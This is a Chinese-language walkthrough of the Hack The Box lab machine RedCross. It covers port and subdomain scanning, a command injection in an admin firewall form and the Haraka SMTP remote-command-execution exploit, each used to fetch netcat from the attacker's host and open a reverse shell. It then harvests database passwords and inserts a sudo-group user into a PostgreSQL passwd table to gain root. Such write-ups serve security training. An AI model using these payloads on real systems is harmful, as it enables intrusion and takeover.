打靶记录(一四二)之HTBRedCross

端口扫描

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 19:36 CST
Nmap scan report for 10.10.10.113
Host is up (0.073s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ sudo nmap -sT -sC -sV -O -p22,80,443 10.10.10.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 19:37 CST
Nmap scan report for 10.10.10.113
Host is up (0.071s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
|   256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_  256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open  ssl/http Apache httpd 2.4.38
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after:  2021-02-27T19:46:58
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 5.0 - 5.5 (88%), Linux 2.6.32 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.70 seconds

添加hosts

Web

不知道是不是环境问题，一扫目录环境就卡死只能重启机器。sqlmap也跑不了，一跑网页就挂了，似乎是有WAF。

扫一下子域

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'https://10.10.10.113' -H "HOST:FUZZ.redcross.htb" -fw 20   

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://10.10.10.113
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.redcross.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 20
________________________________________________

admin                   [Status: 302, Size: 363, Words: 18, Lines: 1, Duration: 66ms]
intra                   [Status: 302, Size: 463, Words: 26, Lines: 1, Duration: 63ms]

登录框没有什么操作，到contact看看，可以发送留言，尝试XSS,最常规的XSS被检测到了，尝试进行混淆，但是似乎触发不了

扫描不了目录就看WP，存在一个documentation/account-signup.pdf是可以访问的，可以在contact中发送用户名来得到凭证

像是这样

POST /pages/actions.php HTTP/1.1

Host: intra.redcross.htb

Cookie: PHPSESSID=7i6i2lcvhdku8vd6j7koqcbsg2

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 69

Origin: https://intra.redcross.htb

Referer: https://intra.redcross.htb/?page=contact

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

Te: trailers

Connection: keep-alive


subject=credentials&body=username%3Dmikannse&cback=111&action=contact

得到凭证guest:guest，但是登录进去没内容。换admin那个网站

又是登陆界面，guest:guest登录不进，但是复制intra登录的cookie发现会自动跳转登陆成功。可以创建一个用户,创建之后会分配一个密码，可以用于ssh登陆，但是登陆进去是一个极其受限的容器环境，并且权限很低，暂时利用不了

添加防火墙白名单，尝试了命令拼接但是失败，会被到字符串不符合,但是发现deny功能没有字符检测,做一个反弹shell.但是试了很多种方式，都失败了，机器上的环境不太好，尝试上传一个nc利用nc来反弹shell,像是:

0.0.0.0;wget http://10.10.14.13:8000/nc -O /tmp/nc;chmod +x /tmp/nc;/tmp/nc -e /bin/bash 10.10.14.13 443

URL编码一下发送，成功反弹shell!

提权

在user.php中发现数据库连接行,是PostgreSQL

$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");

init.php中又有一个凭证，用于mysql连接

cat init.php
<?php
#database configuration
$dbhost='127.0.0.1';
$dbuser='dbcross';
$dbpass='LOSPxnme4f5pH5wp';
$dbname='redcross';
?>

但两个都没什么有用的信息

发现还开了挺多没扫到的端口

www-data@redcross:/var/www/html/admin/pages$ ss -tlnp
ss -tlnp
State     Recv-Q    Send-Q       Local Address:Port        Peer Address:Port    
LISTEN    0         32                 0.0.0.0:21               0.0.0.0:*       
LISTEN    0         128                0.0.0.0:22               0.0.0.0:*       
LISTEN    0         128                0.0.0.0:5432             0.0.0.0:*       
LISTEN    0         128              127.0.0.1:5433             0.0.0.0:*       
LISTEN    0         80               127.0.0.1:3306             0.0.0.0:*       
LISTEN    0         128                   [::]:22                  [::]:*       
LISTEN    0         128                   [::]:5432                [::]:*       
LISTEN    0         128                      *:443                    *:*       
LISTEN    0         128                      *:1025                   *:*       
LISTEN    0         128                      *:80                     *:* 

由于在admin界面可以添加防火墙白名单，把vpnip填入，再次做端口扫描之后，更多端口开放了

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.113     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 11:07 CST
Nmap scan report for intra.redcross.htb (10.10.10.113)
Host is up (0.065s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
1025/tcp open  NFS-or-IIS
5432/tcp open  postgresql

Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds

发现penelope家目录有一个haraka，是一个smtp服务器,也就是1025端口开的那个服务，有一个远程rce,

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ searchsploit haraka                                           
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
Haraka < 2.8.9 - Remote Command Execution                          | linux/remote/41162.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

像是自动发送邮件的，更改脚本中的端口25为机器上所开的1025端口。再次进行一个反弹shell

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ python2 41162.py -c "wget http://10.10.14.13:8000/nc -O /tmp/nc1;chmod +x /tmp/nc1;/tmp/nc1 -e /bin/bash 10.10.14.13 444" -t penelope@redcross.htb -m 10.10.10.113

成功拿到penelope用户的shell。想到之前可以在action.php界面新增用户来ssh登录，应该是通过PostgreSQL数据库，但之前获取的那个凭证权限太低了，在web界面应该还存在别的高权限的凭证

penelope@redcross:/tmp$ grep -ri "password" /var/www/html/
grep -ri "password" /var/www/html/
/var/www/html/admin/pages/login.php:echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
/var/www/html/admin/pages/firewall.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
/var/www/html/admin/pages/users.php:    $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
/var/www/html/admin/pages/actions.php:  $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
/var/www/html/admin/pages/actions.php:  if(password_verify($pass,$hash) and $role==0){
/var/www/html/admin/pages/actions.php:  } else if(password_verify($pass,$hash)){
/var/www/html/admin/pages/actions.php:  $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
/var/www/html/admin/pages/actions.php:  $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
/var/www/html/admin/pages/actions.php:  $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
/var/www/html/admin/pages/actions.php:  $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
/var/www/html/intra/pages/login.php:echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
/var/www/html/intra/pages/actions.php:  $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
/var/www/html/intra/pages/actions.php:  if(password_verify($pass,$hash)){

action.php用的是unixusrmgr:dheu%7wjx8B&

再次连接，能够查看里面的passwd_table表了，既然如此，能够插入一个用户，root身份，并且家目录不在/var/jail，先生成个密码哈希

┌──(mikannse㉿kali)-[~/HTB/redcross]
└─$ openssl passwd -1 admin
$1$eHy5lJSj$9SNACRXaL6jMkFIaQSjj6/

penelope@redcross:/tmp$ psql -h 127.0.0.1 -U unixusrmgr -d unix
psql -h 127.0.0.1 -U unixusrmgr -d unix
Password for user unixusrmgr: dheu%7wjx8B&

psql (11.22 (Debian 11.22-0+deb10u1), server 9.6.7)
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('r0ot', '$1$eHy5lJSj$9SNACRXaL6jMkFIaQSjj6/', 27, '/home/r0ot');
<Hy5lJSj$9SNACRXaL6jMkFIaQSjj6/', 27, '/home/r0ot');
INSERT 0 1

添加一个r0ot用户，gid设置为27，也就是sudo组的gid,家目录另开一个

r0ot@redcross:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for r0ot: 
Matching Defaults entries for r0ot on redcross:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User r0ot may run the following commands on redcross:
    (ALL : ALL) ALL
r0ot@redcross:~$ sudo su
root@redcross:/home/r0ot# id
uid=0(root) gid=0(root) groups=0(root)

碎碎念

这个房间打的体验不太好，服务各种挂，重置了好几次。不过本身还是比较有意思的房间,postgresql的利用。似乎是还有很多别的提权路径，也是很有价值的